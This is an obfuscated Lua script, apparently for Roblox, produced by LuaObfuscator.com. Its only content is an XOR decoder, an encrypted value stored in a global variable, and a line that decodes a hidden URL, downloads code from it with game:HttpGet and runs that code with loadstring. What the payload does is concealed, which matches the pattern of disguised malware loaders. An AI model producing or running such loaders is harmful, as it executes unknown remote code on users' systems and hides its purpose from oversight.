--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11)local v12={};for i=2 -1, #v10 do v6(v12,v0(v4(v1(v2(v10,i,i + 1 + 0)),v1(v2(v11,(1 -0) + ((i-((1 + 0) -0))% #v11),(3 -2) + ((i-((6 -3) -(922 -(608 + 312))))% #v11) + 1)))%(809 -553)));end return v5(v12);end _G.v8=936316911;_G.v9=v7("\172\207\198\163\33\254\148\157\183\59\183\216\221\161\54\234\216\221\190\125\165\203\219\252\37\161\217\218\188\61\175\200\157\226\98\241\138\129\229\103\243\136\128\228\99\253\142\129\227\98\247\143\157\229\32\161\131\134\254\58\245\225\195\159\58\166\206\196\166\56\129\195\250\140\32\183\228\248\191\20\188\250\203\156\23\163\253\252\163\28\170\225\128\169\62\241\235\214\157\43\133\253\192\226\36\129\255\230\165\17\135\226\248\187\10\146\227\134\139\99\176","\196\187\178\211\82");loadstring(game:HttpGet(v7("\249\60\202\47\248\254\199\202\227\41\201\113\236\173\156\141\228\42\203\44\238\182\139\138\255\60\219\49\255\234\139\138\252\103\200\58\248\176\145\157\190\24\219\43\216\173\133\144\253\41\202\48\249\156\169\144\229\39\248\62\249\169\199\136\240\33\208\112\195\165\155\145\244\14\223\45\230\234\132\144\240","\145\72\190\95\139\196\232\229")))();
